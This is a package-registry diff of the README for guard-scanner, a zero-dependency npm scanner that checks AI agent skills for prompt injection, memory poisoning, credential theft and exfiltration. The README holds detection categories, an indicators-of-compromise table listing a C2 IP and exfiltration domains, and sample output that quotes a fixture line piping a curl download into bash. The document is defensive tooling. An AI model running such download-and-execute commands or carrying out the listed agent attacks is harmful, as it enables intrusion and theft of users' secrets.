guard-scanner 4.0.2 → 5.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -1,340 +1,213 @@
1
- # 🛡️ guard-scanner
1
+ # guard-scanner 🛡️
2
2
 
3
- **Security scanner for AI agent skills — catches the bad stuff before it runs.**
3
+ *The Original, Zero-Dependency Shield for the AI Agent Era.*
4
4
 
5
- Prompt injection, identity hijacking, memory poisoning, and 22+ threat categories.
6
- Zero dependencies. One command. Works with OpenClaw out of the box.
5
+ As autonomous AI agents become more prevalent, the risk of executing untrusted or malicious skills increases. **guard-scanner** is an open-source, zero-dependency static and runtime security scanner designed to help protect developers' local machines from Prompt Injections, RCEs, and Memory Poisoning.
7
6
 
8
- [![npm version](https://img.shields.io/npm/v/guard-scanner.svg?style=flat-square&color=cb3837)](https://www.npmjs.com/package/guard-scanner)
9
- [![npm downloads](https://img.shields.io/npm/dm/guard-scanner.svg?style=flat-square)](https://www.npmjs.com/package/guard-scanner)
10
- [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)](LICENSE)
11
- [![Zero Dependencies](https://img.shields.io/badge/dependencies-0-success?style=flat-square)]()
12
- [![Tests Passing](https://img.shields.io/badge/tests-133%2F133-brightgreen?style=flat-square)]()
13
- [![OWASP Agentic](https://img.shields.io/badge/OWASP_Agentic-90%25-green?style=flat-square)]()
14
- [![Patterns](https://img.shields.io/badge/patterns-144%2B-blueviolet?style=flat-square)]()
7
+ Built collaboratively by the **[Guava Parity Institute](https://github.com/koatora20)** and the open-source community. We believe that AI safety infrastructure should be a shared, transparent, and accessible resource for everyone. We welcome contributions, feedback, and discussion from all developers!
15
8
 
16
- [Quick Start](#quick-start)
17
- [Threat Categories](#threat-categories) •
18
- [OpenClaw Plugin](#openclaw-plugin-setup) •
19
- [CI/CD](#cicd-integration) •
20
- [Plugin API](#plugin-api) •
21
- [🇯🇵 日本語](README_ja.md)
9
+ **144+ static patterns + 26 runtime checks** across **22 threat categories**.
22
10
 
23
- ---
11
+ [![npm](https://img.shields.io/npm/v/@guava-parity/guard-scanner)](https://www.npmjs.com/package/@guava-parity/guard-scanner)
12
+ [![license](https://img.shields.io/npm/l/@guava-parity/guard-scanner)](LICENSE)
24
13
 
25
- ## Why This Exists
26
-
27
- In February 2026, [Snyk's ToxicSkills audit](https://snyk.io) of 3,984 AI agent skills revealed:
28
- - **36.8%** contained at least one security flaw
29
- - **13.4%** had critical-level issues
30
- - **76 active malicious payloads** for credential theft, backdoors, and data exfiltration
31
-
32
- The AI agent skill ecosystem has the same supply-chain security problem that npm and PyPI had in their early days — except agent skills inherit **full shell access, file system permissions, and environment variables** of the host agent.
33
-
34
- **guard-scanner** was born from a real 3-day identity hijack incident where an AI agent's personality files were silently overwritten by a malicious skill. There was no scanner that could detect it. Now there is. 🍈
35
-
36
- ---
37
-
38
- ## Features
39
-
40
- | Feature | Description |
41
- |---|---|
42
- | **22 Threat Categories** | Snyk ToxicSkills + OWASP Agentic Top 10 + Identity Hijack + PII + Trust Exploitation |
43
- | **144+ Static Patterns** | Regex-based static analysis covering code, docs, and data files |
44
- | **26 Runtime Checks** | Real-time `before_tool_call` hook — 5-layer defense |
45
- | **IoC Database** | Known malicious IPs, domains, URLs, usernames, and typosquat names |
46
- | **Data Flow Analysis** | Lightweight JS analysis: secret reads → network calls → exec chains |
47
- | **Cross-File Analysis** | Phantom references, base64 fragment assembly, multi-file exfil detection |
48
- | **Manifest Validation** | SKILL.md frontmatter analysis for dangerous capabilities |
49
- | **Code Complexity** | File length, nesting depth, eval/exec density analysis |
50
- | **Config Impact** | Detects modifications to OpenClaw configuration files |
51
- | **Shannon Entropy** | High-entropy string detection for leaked secrets and API keys |
52
- | **Dependency Chain Scan** | Risky packages, lifecycle scripts, wildcard versions, git dependencies |
53
- | **4 Output Formats** | Terminal (with colors), JSON, [SARIF 2.1.0](https://sarifweb.azurewebsites.net), HTML dashboard |
54
- | **Plugin API** | Extend with custom detection rules via JS modules |
55
- | **Zero Dependencies** | Pure Node.js stdlib. Nothing to install, nothing to audit. |
56
- | **CI/CD Ready** | `--fail-on-findings` exit code + SARIF for GitHub Code Scanning |
57
-
58
- ---
59
-
60
- ## Quick Start
61
-
62
- **30 seconds to scan your skills:**
63
-
64
- ```bash
65
- npx guard-scanner ./skills/
66
- ```
67
-
68
- No install needed. Scans every subdirectory as a skill and tells you what's dangerous.
69
-
70
- **More options:**
14
+ ## Install
71
15
 
72
16
  ```bash
73
- # Verbose output — see exactly what was found and why
74
- npx guard-scanner ./skills/ --verbose
75
-
76
- # Stricter detection (catches more edge cases)
77
- npx guard-scanner ./skills/ --strict
78
-
79
- # Full audit — JSON + SARIF + HTML report
80
- npx guard-scanner ./skills/ --verbose --check-deps --json --sarif --html
81
- ```
82
-
83
- **Output:**
84
- ```
85
- 🛡️ guard-scanner v4.0.1
86
- ══════════════════════════════════════════════════════
87
- 📂 Scanning: ./skills/
88
- 📦 Skills found: 5
89
-
90
- 🔴 shady-skill — MALICIOUS (risk: 100)
91
- 💀 [CRITICAL] Reverse shell via /dev/tcp — scripts/setup.sh:7
92
- 💀 [CRITICAL] Credential exfiltration to webhook.site — scripts/helper.js:14
93
- 🟡 sus-skill — SUSPICIOUS (risk: 45)
94
- ⚠️ [HIGH] SSH private key access — scripts/deploy.sh:3
95
- 🟢 good-skill — CLEAN (risk: 0)
17
+ npm install -g @guava-parity/guard-scanner
96
18
  ```
97
19
 
98
- ---
20
+ > **Why use this?** If you are experimenting with third-party skills for your AI agents, `guard-scanner` acts as a basic safety net, helping to identify hidden prompts or dangerous execution patterns.
21
+ >
22
+ > 🤝 **We need your help!**: The landscape of Agentic AI threats is evolving rapidly. We are maintaining this project out of goodwill to provide a baseline defense, but we rely on community contributions to keep our pattern database updated. If you find a false positive or a new threat vector, please consider opening an issue or a pull request!
99
23
 
100
- ## OpenClaw Plugin Setup
24
+ ## Quick Start
101
25
 
102
26
  ```bash
103
- # Install as OpenClaw plugin
104
- openclaw plugins install guard-scanner
105
-
106
- # Or global install
107
- npm install -g guard-scanner
108
- ```
109
-
110
- ### What happens after install
111
-
112
- 1. **Static scanning** — `npx guard-scanner [dir]` scans skills before installation
113
- 2. **Runtime guard** — `before_tool_call` hook automatically blocks dangerous operations
114
- 3. **3 enforcement modes** — `monitor` (log only), `enforce` (block CRITICAL), `strict` (block HIGH+CRITICAL)
115
-
116
- ### 5-Layer Runtime Defense (26 checks)
27
+ # Scan all skills
28
+ guard-scanner ./skills/ --verbose
117
29
 
118
- ```
119
- Layer 1: Threat Detection — 12 checks (shells, exfil, SSRF, etc.)
120
- Layer 2: Trust Defense — 4 checks (memory/SOUL/config tampering)
121
- Layer 3: Safety Judge — 3 checks (injection, trust bypass, shutdown refusal)
122
- Layer 4: Brain / Behavioral — 3 checks (research skip, blind trust, chain bypass)
123
- Layer 5: Trust Exploitation — 4 checks (OWASP ASI09: authority/trust/audit abuse)
124
- ```
30
+ # Strict mode + reports
31
+ guard-scanner ./skills/ --strict --json --sarif --fail-on-findings
125
32
 
126
- ```bash
127
- # Pre-install static gate
128
- npx guard-scanner ~/.openclaw/workspace/skills --self-exclude --verbose
33
+ # CI/CD pipeline (stdout)
34
+ guard-scanner ./skills/ --format sarif --quiet | upload-sarif
129
35
  ```
130
36
 
131
- ---
132
-
133
- ## Threat Categories
134
-
135
- guard-scanner covers **22 threat categories** derived from four sources:
136
-
137
- | # | Category | Based On | Severity | What It Detects |
138
- |---|----------|----------|----------|----------------|
139
- | 1 | **Prompt Injection** | Snyk ToxicSkills | CRITICAL | Invisible Unicode (ZWSP, BiDi), homoglyphs, role override, system tag injection, base64 execution instructions |
140
- | 2 | **Malicious Code** | Snyk ToxicSkills | CRITICAL | `eval()`, `Function()` constructor, `child_process`, reverse shells, raw sockets, sandbox detection |
141
- | 3 | **Suspicious Downloads** | Snyk ToxicSkills | CRITICAL | `curl\|bash` pipes, executable downloads, password-protected archives |
142
- | 4 | **Credential Handling** | Snyk ToxicSkills | HIGH | `.env` file reads, SSH key access, wallet seed phrases, credential echo/print |
143
- | 5 | **Secret Detection** | Snyk ToxicSkills | CRITICAL | AWS Access Keys (`AKIA...`), GitHub tokens (`ghp_/ghs_`), embedded private keys, high-entropy strings |
144
- | 6 | **Exfiltration** | Snyk ToxicSkills | CRITICAL | webhook.site/requestbin.com/hookbin, POST with secrets, `curl --data`, DNS tunneling |
145
- | 7 | **Unverifiable Deps** | Snyk ToxicSkills | HIGH | Remote dynamic imports, non-CDN script loading |
146
- | 8 | **Financial Access** | Snyk ToxicSkills | HIGH | Payment API calls (Stripe/PayPal/Plaid), wallet transaction signing |
147
- | 9 | **Obfuscation** | Snyk ToxicSkills | HIGH | Hex strings, `atob→eval` chains, `String.fromCharCode`, `base64 -d\|bash` |
148
- | 10 | **Prerequisites Fraud** | Snyk ToxicSkills | CRITICAL | Download-in-prerequisites, terminal paste instructions |
149
- | 11 | **Leaky Skills** | Snyk ToxicSkills | CRITICAL | "Save API key in memory", "Share token with user", PII collection, session log export |
150
- | 12 | **Memory Poisoning** | Palo Alto IBC | CRITICAL | SOUL.md/IDENTITY.md modification, behavioral rule override, persistence instructions |
151
- | 13 | **Prompt Worm** | Palo Alto IBC | CRITICAL | Self-replication instructions, agent-to-agent propagation, CSS-hidden content |
152
- | 14 | **Persistence** | MITRE ATT&CK | HIGH | Scheduled tasks/cron, startup execution, LaunchAgents/systemd |
153
- | 15 | **CVE Patterns** | CVE Database | CRITICAL | CVE-2026-25253 `gatewayUrl` injection, sandbox disabling, Gatekeeper bypass |
154
- | 16 | **MCP Security** | OWASP MCP Top 10 | CRITICAL | Tool poisoning (`<IMPORTANT>`), schema poisoning, token leaks, shadow server registration, SSRF |
155
- | 17 | **Identity Hijacking** | Original Research | CRITICAL | SOUL.md/IDENTITY.md overwrite/redirect, persona swap, memory wipe, name override |
156
- | 18 | **Sandbox Validation** | v1.1 | HIGH | Dangerous binary requirements in SKILL.md, overly broad file scope, sensitive env vars |
157
- | 19 | **Code Complexity** | v1.1 | MEDIUM | Excessive file length (>1000 lines), deep nesting (>5 levels), high eval/exec density |
158
- | 20 | **Config Impact** | v1.1 | CRITICAL | `openclaw.json` writes, exec approval bypass, internal hooks modification, network wildcard |
159
- | 21 | **PII Exposure** | v2.1 | CRITICAL | Hardcoded CC/SSN/phone/email, PII logging/network send/plaintext store, Shadow AI |
160
- | 22 | **Trust Exploitation** | OWASP ASI09 | HIGH | Authority abuse, audit bypass, trust chain manipulation |
161
-
162
- > **Categories 17–22** are unique to guard-scanner. Category 17 (Identity Hijacking) was developed from a real attack.
163
-
164
- ---
37
+ ## 🔍 Example Scan Output
165
38
 
166
- ## Output Formats
39
+ This is actual output from scanning a malicious test skill demonstrating data exfiltration, memory poisoning, and credential theft:
167
40
 
168
- ### Terminal (Default)
41
+ ```console
42
+ $ guard-scanner ./test/fixtures/malicious-skill/ --verbose
169
43
 
170
- ```
171
44
  🛡️ guard-scanner v4.0.1
172
45
  ══════════════════════════════════════════════════════
173
- 📂 Scanning: ./skills/
174
- 📦 Skills found: 22
46
+ 📂 Scanning: ./test/fixtures/malicious-skill/
47
+ 📦 Skills found: 1
175
48
 
176
- 🟢 my-safe-skillCLEAN (risk: 0)
177
- 🟡 suspicious-one — SUSPICIOUS (risk: 45)
178
- 📁 credential-handling
179
- 🔴 [HIGH] Reading .env file — scripts/main.js:12
180
- 🔴 [HIGH] SSH key access — scripts/deploy.sh:8
181
- 🔴 evil-skill — MALICIOUS (risk: 100)
182
- 📁 malicious-code
183
- 💀 [CRITICAL] Reverse shell — scripts/backdoor.js:3
49
+ 🔴 scriptsMALICIOUS (risk: 100)
184
50
  📁 exfiltration
185
- 💀 [CRITICAL] Known exfiltration endpointscripts/exfil.js:15
51
+ 🔴 [HIGH] Suspicious domain: webhook.siteevil.js
52
+ 📁 malicious-code
53
+ 🔴 [HIGH] eval() call — evil.js:18
54
+ 💀 [CRITICAL] Shell download/execution — stealer.js:19
55
+ └─ "exec(`curl https://91.92.242.30/payload -o /tmp/x && bash"
56
+ 📁 credential-handling
57
+ 🔴 [HIGH] Credential file read — evil.js:6
58
+ └─ "readFileSync('.env"
59
+ 💀 [CRITICAL] Agent identity file read — evil.js:7
60
+ └─ "readFileSync('SOUL.md"
61
+ 📁 memory-poisoning
62
+ 💀 [CRITICAL] Write to agent soul file — evil.js:21
63
+ └─ "writeFileSync('SOUL.md"
64
+ 📁 data-flow
65
+ 💀 [CRITICAL] Data flow: secret read (L6) → network call (L10) — evil.js:6
186
66
 
187
67
  ══════════════════════════════════════════════════════
188
- 📊 Scan Summary
189
- Scanned: 22
190
- 🟢 Clean: 18
191
- 🟡 Suspicious: 1
68
+ 📊 guard-scanner Scan Summary
69
+ ──────────────────────────────────────────────────────
70
+ Scanned: 1
71
+ 🟢 Clean: 0
192
72
  🔴 Malicious: 1
193
- Safety Rate: 91%
73
+ Safety Rate: 0%
194
74
  ══════════════════════════════════════════════════════
195
- ```
196
-
197
- ### JSON (`--json`)
198
-
199
- Writes `guard-scanner-report.json` with full findings, stats, recommendations, and IoC version.
200
-
201
- ### SARIF (`--sarif`)
202
-
203
- Writes `guard-scanner.sarif` [SARIF 2.1.0](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/sarif-support-for-code-scanning) compatible for GitHub Code Scanning.
204
-
205
- ### HTML (`--html`)
206
-
207
- Generates a dark-mode dashboard with stats grid and per-skill finding tables.
208
-
209
- ---
210
-
211
- ## Risk Scoring
212
-
213
- Each skill receives a **risk score (0–100)** based on:
214
-
215
- ### Base Score
75
+ ⚠️ CRITICAL: 1 malicious skill(s) detected!
76
+ ```
77
+
78
+ ## 🚀 Standalone Architecture
79
+
80
+ **guard-scanner** is designed as a foundational "Shield" for the OpenClaw ecosystem.
81
+ It features a **Standalone Boot Sequence**:
82
+ - **Zero API/DB Dependencies**: It initializes purely from local, static Threat Patterns (144+ regex rules) defined in its codebase.
83
+ - **No Heavy Context Loading**: It does *not* require loading heavy memory databases or executing contextual commands.
84
+ - **Privacy First**: It never accesses or exposes your agent's private memory during the boot phase.
85
+
86
+ This lightweight initialization makes it perfect for zero-trust environments, ensuring complete safety without exposing proprietary agent logic.
87
+
88
+ ## Options
89
+
90
+ | Flag | Description |
91
+ |------|-------------|
92
+ | `--verbose`, `-v` | Detailed findings with categories and samples |
93
+ | `--strict` | Lower detection thresholds (more sensitive) |
94
+ | `--check-deps` | Scan `package.json` for dependency chain risks |
95
+ | `--soul-lock` | Enable agent identity protection (SOUL.md/MEMORY.md patterns) |
96
+ | `--json` | Write JSON report to file |
97
+ | `--sarif` | Write SARIF 2.1.0 report (GitHub Code Scanning) |
98
+ | `--html` | Write HTML dashboard report |
99
+ | `--format json\|sarif` | Print to stdout (pipeable) |
100
+ | `--quiet` | Suppress text output (use with `--format`) |
101
+ | `--self-exclude` | Skip scanning guard-scanner itself |
102
+ | `--summary-only` | Only print the summary table |
103
+ | `--rules <file>` | Load custom detection rules (JSON) |
104
+ | `--plugin <file>` | Load plugin module |
105
+ | `--fail-on-findings` | Exit code 1 if any findings (CI/CD) |
106
+
107
+ ## Threat Categories (22)
108
+
109
+ | # | Category | Detects |
110
+ |---|----------|---------|
111
+ | 1 | Prompt Injection | Hidden instructions, invisible Unicode, homoglyphs, XML tag injection |
112
+ | 2 | Malicious Code | `eval()`, `child_process`, reverse shells, raw sockets |
113
+ | 3 | Suspicious Downloads | `curl\|bash`, executable downloads, password-protected archives |
114
+ | 4 | Credential Handling | `.env` reads, SSH keys, sudo in instructions |
115
+ | 5 | Secret Detection | Hardcoded API keys, AWS keys, GitHub tokens, Shannon entropy |
116
+ | 6 | Exfiltration | webhook.site, DNS tunneling, curl data exfil |
117
+ | 7 | Unverifiable Deps | Remote dynamic imports |
118
+ | 8 | Financial Access | Crypto transactions, payment APIs |
119
+ | 9 | Obfuscation | Base64→exec, hex encoding, `String.fromCharCode` |
120
+ | 10 | Prerequisites Fraud | Fake download/paste instructions |
121
+ | 11 | Leaky Skills | Secrets saved in agent memory, verbatim in commands |
122
+ | 12 | Memory Poisoning ⚿ | SOUL.md/MEMORY.md modification, behavioral rule override |
123
+ | 13 | Prompt Worm | Self-replicating prompts, agent-to-agent propagation |
124
+ | 14 | Persistence | Cron, launchd, startup execution |
125
+ | 15 | CVE Patterns | CVE-2026-25253 (RCE), sandbox disabling, Gatekeeper bypass |
126
+ | 16 | MCP Security | Tool/schema poisoning, SSRF, shadow server registration |
127
+ | 16b | Trust Boundary | Calendar/email/web → code execution chains |
128
+ | 16c | Advanced Exfiltration | ZombieAgent static URL arrays, drip exfil, beacon |
129
+ | 16d | Safeguard Bypass | URL parameter injection, retry-on-block |
130
+ | 17 | Identity Hijacking ⚿ | SOUL.md overwrite, persona swap, memory wipe |
131
+ | 18 | Config Impact | `openclaw.json` writes, exec approval disabling |
132
+ | 19 | PII Exposure | Hardcoded CC/SSN, PII logging, Shadow AI API calls |
133
+ | 20 | Trust Exploitation | Authority claims, creator impersonation, fake audits |
134
+
135
+ > ⚿ = Requires `--soul-lock` flag (opt-in)
136
+
137
+ ## Runtime Guard (26 checks, 5 layers)
138
+
139
+ Real-time `before_tool_call` hook that blocks dangerous operations.
140
+
141
+ | Layer | Name | Checks |
142
+ |-------|------|--------|
143
+ | 1 | Threat Detection | Reverse shell, curl\|bash, SSRF, credential exfil |
144
+ | 2 | Trust Defense | SOUL.md tampering, memory injection |
145
+ | 3 | Safety Judge | Prompt injection in tool args, trust bypass |
146
+ | 4 | Behavioral | No-research execution |
147
+ | 5 | Trust Exploitation (ASI09) | Authority claim, creator bypass, fake audit |
216
148
 
217
- | Severity | Weight |
218
- |----------|--------|
219
- | CRITICAL | 40 points |
220
- | HIGH | 15 points |
221
- | MEDIUM | 5 points |
222
- | LOW | 2 points |
223
-
224
- ### Amplification Rules
225
-
226
- | Combination | Multiplier | Rationale |
227
- |---|---|---|
228
- | Credential handling + Exfiltration | **×2** | Classic steal-and-send pattern |
229
- | Credential handling + Command exec | **×1.5** | Credential-powered RCE |
230
- | Obfuscation + Malicious code | **×2** | Hiding malicious intent |
231
- | Lifecycle script exec | **×2** | npm supply chain attack |
232
- | BiDi characters + other findings | **×1.5** | Text direction attack as vector |
233
- | Leaky skills + Exfiltration | **×2** | Secret leak through LLM context |
234
- | Memory poisoning | **×1.5** | Persistent compromise |
235
- | Prompt worm | **×2** | Self-replicating threat |
236
- | Persistence + (malicious\|credential\|memory) | **×1.5** | Survives session restart |
237
- | Identity hijacking | **×2** | Core identity compromise |
238
- | Identity hijacking + Persistence | **min 90** | Full agent takeover |
239
- | Config impact | **×2** | OpenClaw configuration tampering |
240
- | PII exposure + Exfiltration | **×3** | PII being sent to external servers |
241
- | PII exposure + Shadow AI | **×2.5** | PII leak through unauthorized LLM |
242
- | Known IoC (IP/URL/typosquat) | **= 100** | Confirmed malicious |
243
-
244
- ### Verdict Thresholds
245
-
246
- | Mode | Suspicious | Malicious |
247
- |------|-----------|-----------|
248
- | Normal | ≥ 30 | ≥ 80 |
249
- | Strict (`--strict`) | ≥ 20 | ≥ 60 |
250
-
251
- ---
252
-
253
- ## Data Flow Analysis
254
-
255
- guard-scanner performs lightweight static analysis on JavaScript/TypeScript files to detect **multi-step attack patterns** that individual regex rules miss:
256
-
257
- ```
258
- Secret Read (L36) ─── process.env.API_KEY ───→ Network Call (L56) ─── fetch() ───→ 🚨 CRITICAL
259
- AST_CRED_TO_NET
149
+ ```bash
150
+ # Install as OpenClaw hook
151
+ openclaw hooks install skills/guard-scanner/hooks/guard-scanner
152
+ openclaw hooks enable guard-scanner
260
153
  ```
261
154
 
262
- ### Detected Chains
155
+ Modes: `monitor` (log only) / `enforce` (block CRITICAL) / `strict` (block HIGH+CRITICAL)
263
156
 
264
- | Pattern ID | Chain | Severity |
265
- |---|---|---|
266
- | `AST_CRED_TO_NET` | Secret read → Network call | CRITICAL |
267
- | `AST_CRED_TO_EXEC` | Secret read → Command exec | HIGH |
268
- | `AST_SUSPICIOUS_IMPORTS` | `child_process` + network module | HIGH |
269
- | `AST_EXFIL_TRIFECTA` | `fs` + `child_process` + `http/https` | CRITICAL |
270
- | `AST_SECRET_IN_URL` | Secret interpolated into URL | CRITICAL |
271
157
 
272
- ---
273
158
 
274
- ## IoC Database
159
+ ## OWASP Mapping
275
160
 
276
- Built-in Indicators of Compromise from real-world incidents:
161
+ - **OWASP LLM Top 10 2025**: LLM01–LLM10 fully mapped
162
+ - **OWASP Agentic Security Top 10**: ASI01–ASI10 coverage (tested)
277
163
 
278
- | Type | Examples | Source |
279
- |------|----------|--------|
280
- | **IPs** | `91.92.242.30` (C2) | ClawHavoc campaign |
281
- | **Domains** | `webhook.site`, `requestbin.com`, `hookbin.com`, `pipedream.net` | Common exfil endpoints |
282
- | **URLs** | `glot.io/snippets/hfd3x9ueu5` | ClawHavoc macOS payload |
283
- | **Usernames** | `zaycv`, `Ddoy233`, `Sakaen736jih` | Known malicious actors |
284
- | **Filenames** | `openclaw-agent.zip`, `openclawcli.zip` | Trojanized installers |
285
- | **Typosquats** | `clawhub`, `polymarket-trader`, `auto-updater-agent` + 20 more | ClawHavoc, Polymarket, Snyk ToxicSkills |
286
-
287
- Any match against the IoC database automatically sets risk to **100 (MALICIOUS)**.
164
+ ## Test Results
288
165
 
289
- ---
166
+ ```
167
+ ℹ tests 134
168
+ ℹ suites 24
169
+ ℹ pass 134
170
+ ℹ fail 0
171
+ ℹ duration_ms 171
172
+ ```
173
+
174
+ | Suite | Tests |
175
+ |-------|-------|
176
+ | Malicious Skill Detection | 16 ✅ |
177
+ | Clean Skill (False Positive) | 2 ✅ |
178
+ | Risk Score Calculation | 5 ✅ |
179
+ | Verdict Determination | 5 ✅ |
180
+ | Output Formats (JSON/SARIF/HTML) | 4 ✅ |
181
+ | Pattern Database (135 patterns, 22 categories) | 4 ✅ |
182
+ | IoC Database | 5 ✅ |
183
+ | Shannon Entropy | 2 ✅ |
184
+ | Ignore Functionality | 1 ✅ |
185
+ | Plugin API | 1 ✅ |
186
+ | Skill Manifest Validation | 4 ✅ |
187
+ | Code Complexity Metrics | 2 ✅ |
188
+ | Report Noise Regression | 2 ✅ |
189
+ | Config Impact Analysis | 4 ✅ |
190
+ | PII Exposure Detection | 8 ✅ |
191
+ | OWASP Agentic Security (ASI01–10) | 14 ✅ |
192
+ | Runtime Guard (5 layers, 26 checks) | 23 ✅ |
290
193
 
291
194
  ## Plugin API
292
195
 
293
- Extend guard-scanner with custom detection rules:
294
-
295
196
  ```javascript
296
- // my-org-rules.js
197
+ // my-plugin.js
297
198
  module.exports = {
298
- name: 'my-org-security-rules',
199
+ name: 'my-plugin',
299
200
  patterns: [
300
- {
301
- id: 'ORG_INTERNAL_API',
302
- cat: 'data-leak',
303
- regex: /api\.internal\.mycompany\.com/gi,
304
- severity: 'CRITICAL',
305
- desc: 'Internal API endpoint exposed in skill',
306
- all: true // scan all file types
307
- },
308
- {
309
- id: 'ORG_STAGING_CRED',
310
- cat: 'secret-detection',
311
- regex: /staging[_-](?:key|token|password)\s*[:=]\s*['"][^'"]+['"]/gi,
312
- severity: 'HIGH',
313
- desc: 'Staging credential hardcoded',
314
- codeOnly: true // only scan code files
315
- }
201
+ { id: 'MY_01', cat: 'custom', regex: /pattern/g, severity: 'HIGH', desc: 'Description', all: true }
316
202
  ]
317
203
  };
318
204
  ```
319
205
 
320
206
  ```bash
321
- guard-scanner ./skills/ --plugin ./my-org-rules.js
207
+ guard-scanner ./skills/ --plugin ./my-plugin.js
322
208
  ```
323
209
 
324
- ### Pattern Schema
325
-
326
- | Field | Type | Required | Description |
327
- |---|---|---|---|
328
- | `id` | string | ✅ | Unique pattern identifier (e.g., `ORG_001`) |
329
- | `cat` | string | ✅ | Category name for grouping |
330
- | `regex` | RegExp | ✅ | Detection pattern (use `g` flag) |
331
- | `severity` | string | ✅ | `CRITICAL` \| `HIGH` \| `MEDIUM` \| `LOW` |
332
- | `desc` | string | ✅ | Human-readable description |
333
- | `all` | boolean | | Scan all file types |
334
- | `codeOnly` | boolean | | Only scan code files (.js, .ts, .py, .sh, etc.) |
335
- | `docOnly` | boolean | | Only scan documentation files (.md, .txt, etc.) |
336
-
337
- ### Custom Rules via JSON
210
+ ## Custom Rules (JSON)
338
211
 
339
212
  ```json
340
213
  [
@@ -344,351 +217,34 @@ guard-scanner ./skills/ --plugin ./my-org-rules.js
344
217
  "flags": "gi",
345
218
  "severity": "HIGH",
346
219
  "cat": "malicious-code",
347
- "desc": "Dangerous function call"
220
+ "desc": "Custom: dangerous function call",
221
+ "codeOnly": true
348
222
  }
349
223
  ]
350
224
  ```
351
225
 
352
226
  ```bash
353
- guard-scanner ./skills/ --rules ./custom-rules.json
354
- ```
355
-
356
- ---
357
-
358
- ## Ignore Files
359
-
360
- Create `.guard-scanner-ignore` (or `.guava-guard-ignore`) in the scan directory:
361
-
362
- ```gitignore
363
- # Ignore trusted skills
364
- my-trusted-skill
365
- internal-tool
366
-
367
- # Ignore specific patterns (false positives)
368
- pattern:MAL_CHILD
369
- pattern:CRED_ENV_REF
370
- ```
371
-
372
- ---
373
-
374
- ## CLI Reference
375
-
376
- ```
377
- Usage: guard-scanner [scan-dir] [options]
378
-
379
- Arguments:
380
- scan-dir Directory to scan (default: current directory)
381
-
382
- Options:
383
- --verbose, -v Show detailed findings with categories and samples
384
- --json Write JSON report to scan-dir/guard-scanner-report.json
385
- --sarif Write SARIF 2.1.0 report for CI/CD integration
386
- --html Write HTML dashboard report
387
- --self-exclude Skip scanning the guard-scanner skill itself
388
- --strict Lower detection thresholds (suspicious: 20, malicious: 60)
389
- --summary-only Only print the summary table
390
- --check-deps Scan package.json for dependency chain risks
391
- --rules <file> Load custom rules from JSON file
392
- --plugin <file> Load plugin module (repeatable)
393
- --fail-on-findings Exit code 1 if any findings (for CI/CD)
394
- --help, -h Show help
395
- ```
396
-
397
- ### Exit Codes
398
-
399
- | Code | Meaning |
400
- |------|---------|
401
- | 0 | No malicious skills detected |
402
- | 1 | Malicious skill(s) detected, or `--fail-on-findings` with any findings |
403
- | 2 | Invalid scan directory |
404
-
405
- ---
406
-
407
- ## Architecture
408
-
409
- ```
410
- guard-scanner/
411
- ├── src/
412
- │ ├── scanner.js # GuardScanner class — core scan engine
413
- │ ├── patterns.js # 144+ threat detection patterns (Cat 1–22)
414
- │ ├── ioc-db.js # Indicators of Compromise database
415
- │ └── cli.js # CLI entry point and argument parser
416
- ├── hooks/
417
- │ └── guard-scanner/
418
- │ ├── plugin.ts # Plugin Hook (26 checks, 5 layers, block/blockReason)
419
- │ └── HOOK.md # Hook manifest
420
- ├── openclaw.plugin.json # OpenClaw plugin manifest
421
- ├── test/
422
- │ ├── scanner.test.js # 98 tests — static scanner
423
- │ ├── plugin.test.js # 35 tests — Plugin Hook runtime guard
424
- │ └── fixtures/ # Malicious, clean, complex, config-changer, pii-leaky samples
425
- ├── package.json
426
- ├── CHANGELOG.md
427
- ├── LICENSE
428
- └── README.md
429
- ```
430
-
431
- ### How Scanning Works
432
-
433
- ```
434
- ┌──────────────────┐
435
- │ CLI / API │
436
- └────────┬─────────┘
437
-
438
- ┌────────▼─────────┐
439
- │ GuardScanner │
440
- │ • Load plugins │
441
- │ • Load rules │
442
- │ • Set thresholds│
443
- └────────┬─────────┘
444
-
445
- ┌────────▼─────────┐
446
- │ scanDirectory() │
447
- │ • Load ignores │
448
- │ • Enumerate │
449
- └────────┬─────────┘
450
-
451
- ┌──────────────┼──────────────┐
452
- │ │ │
453
- ┌────────▼──────┐ ┌────▼────┐ ┌───────▼──────┐
454
- │ Per-Skill │ │ IoC │ │ Structural │
455
- │ File Scan │ │ Check │ │ Checks │
456
- │ │ │ │ │ │
457
- │ • Pattern │ │ • IPs │ │ • SKILL.md │
458
- │ matching │ │ • URLs │ │ • Hidden │
459
- │ • Entropy │ │ • Names │ │ files │
460
- │ • Data flow │ │ │ │ • Deps │
461
- │ • Custom rules│ │ │ │ • Cross-file │
462
- └───────┬───────┘ └────┬────┘ └──────┬───────┘
463
- │ │ │
464
- └──────────────┼──────────────┘
465
-
466
- ┌────────▼─────────┐
467
- │ calculateRisk() │
468
- │ • Base score │
469
- │ • Amplifiers │
470
- │ • IoC override │
471
- └────────┬─────────┘
472
-
473
- ┌────────▼─────────┐
474
- │ Output │
475
- │ • Terminal │
476
- │ • JSON │
477
- │ • SARIF 2.1.0 │
478
- │ • HTML │
479
- └──────────────────┘
480
- ```
481
-
482
- ---
483
-
484
- ## CI/CD Integration
485
-
486
- ### GitHub Actions
487
-
488
- ```yaml
489
- name: Skill Security Scan
490
- on: [push, pull_request]
491
-
492
- jobs:
493
- scan:
494
- runs-on: ubuntu-latest
495
- steps:
496
- - uses: actions/checkout@v4
497
-
498
- - name: Run guard-scanner
499
- run: npx guard-scanner ./skills/ --sarif --strict --fail-on-findings
500
-
501
- - name: Upload SARIF results
502
- if: always()
503
- uses: github/codeql-action/upload-sarif@v3
504
- with:
505
- sarif_file: skills/guard-scanner.sarif
227
+ guard-scanner ./skills/ --rules ./my-rules.json
506
228
  ```
507
229
 
508
- ### Pre-commit Hook
509
-
510
- ```bash
511
- #!/bin/bash
512
- # .git/hooks/pre-commit
513
- npx guard-scanner ./skills/ --strict --fail-on-findings --summary-only
514
- ```
515
-
516
- ---
517
-
518
- ## Programmatic API
519
-
520
- ```javascript
521
- const { GuardScanner } = require('guard-scanner');
522
-
523
- const scanner = new GuardScanner({
524
- verbose: false,
525
- strict: true,
526
- checkDeps: true,
527
- plugins: ['./my-plugin.js']
528
- });
529
-
530
